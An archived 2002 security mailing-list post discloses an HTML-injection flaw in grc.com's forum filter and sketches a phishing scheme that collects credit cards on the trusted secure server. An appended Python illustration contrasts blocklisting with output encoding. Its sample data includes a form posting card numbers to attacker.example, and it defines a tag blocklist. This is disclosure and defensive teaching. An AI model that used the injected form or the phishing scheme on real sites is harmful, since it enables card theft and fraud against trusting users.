Classic Cross Site Scripting: Gibson Research Corporation

From: http-equiv@excite.com
Date: 05/01/02


Date:         Wed, 1 May 2002 16:34:47 -0000
From: "http-equiv@excite.com" <http-equiv@MALWARE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Wednesday, May 01, 2002

The following represents a classic [fitting] working example of the
dangers of Cross Site Scripting.

[see: http://www.cert.org/advisories/CA-2000-02.html
http://www.cert.org/archive/pdf/cross_site_scripting.pdf]

Gibson Research Corporation http://www.grc.com is an interesting site
covering a wide variety of security topics for newcomers. Cursory
research suggests that it enjoys a substantial loyal following who
trust it implicitly.

The problem is two-fold:

1. The site has a web based discussion forum
2. The site has a custom 'filter', the so-called: "Gibson Research
Corporation's IIS Advanced Prophylactic Filter"

This custom 'filter' is supposed to protect the server
from 'malicious abuse' and both 'detect and block' invalid requests
submitted to the server:

http://www.grc.com/apf/

[screen shot: http://www.malware.com/flitty.png 25KB]

Unfortunately, what it actually does is allow us to inject our own
html code through grc.com's secured server. This is particularly
ticklish as it does not take much to conjure up a scenario where we
construct a 'fake' e-commerce page, say peddling a book or 'gadget'
download and simply invite the loyal following to go and submit their
credit card details to our custom form.

The site grc.com is well known and trusted. The page is on a secured
server with valid certificates.

Ripe For Picking™

Crude Working example:

note: custom crafted for Internet Explorer 5.5 and 6

http://www.malware.com/grc.html

[screen shot: http://www.malware.com/lucre.png 11KB]

Notes:

1. Watch where you "point and click". It's all smoke and mirrors out
there.
2. 3 mail messages within 72 hours to support @ grc.com remain
unanswered to date.

End Call

--
http://www.malware.com
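The point of the post above is that a request-level "prophylactic filter" is the wrong layer for stopping injected HTML: a blocklist of known-bad tokens does not stop a plain form element, while encoding untrusted forum text at output time neutralises every tag regardless of its name. The following Python is an added illustration of that contrast and is not code from the post, from grc.com or from the filter it names; the sample forum posts, the `BLOCKLIST` pattern and the `attacker.example` host are constructed for the example.

```python
import html
import re

# Constructed sample forum posts (not from the advisory): one benign,
# one with a script tag, one with an ordinary form that posts card data
# to a third party. The third is the scenario the advisory describes.
POSTS = [
    "Great article on drive recovery, thanks!",
    "<script>alert(1)</script>",
    '<form action="https://attacker.example/collect" method="post">'
    'Card number: <input name="cc"><input type="submit" value="Buy"></form>',
]

# A request-level blocklist in the spirit of a "prophylactic filter":
# reject a request that contains a few well-known dangerous tags.
# Shown only to contrast with output encoding; this is the weak approach.
BLOCKLIST = re.compile(r"<\s*/?\s*(script|iframe|object|embed)\b", re.IGNORECASE)

# Any HTML tag at all (opening or closing), used as a detection check.
TAG = re.compile(r"<[a-zA-Z/][^>]*>")


def blocklist_filter_accepts(text: str) -> bool:
    """Return True if the blocklist-style filter would let this post through."""
    return BLOCKLIST.search(text) is None


def render_untrusted(text: str) -> str:
    """Contextual output encoding for HTML element content.

    The post is escaped when it is placed into the page, so whatever tag
    the poster used becomes inert text rather than markup.
    """
    return html.escape(text, quote=True)


def contains_markup(fragment: str) -> bool:
    """Detection check: does this fragment still contain a live HTML tag?"""
    return TAG.search(fragment) is not None


def evaluate(posts):
    """For each post, compare the blocklist verdict with what output
    encoding achieves. Returns a list of dicts, one per post."""
    results = []
    for post in posts:
        results.append({
            "blocklist_accepts": blocklist_filter_accepts(post),
            "raw_has_markup": contains_markup(post),
            "encoded_has_markup": contains_markup(render_untrusted(post)),
        })
    return results


if __name__ == "__main__":
    for post, verdict in zip(POSTS, evaluate(POSTS)):
        print(f"{post[:40]!r:45} {verdict}")
```

Running it shows the gap the advisory points at: the blocklist rejects the script tag but accepts the form post unchanged, whereas the encoded rendering of every post contains no tag at all. The check to apply to a forum like the one described is therefore on the rendering path (is untrusted text escaped for the context it lands in), not on the request filter.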


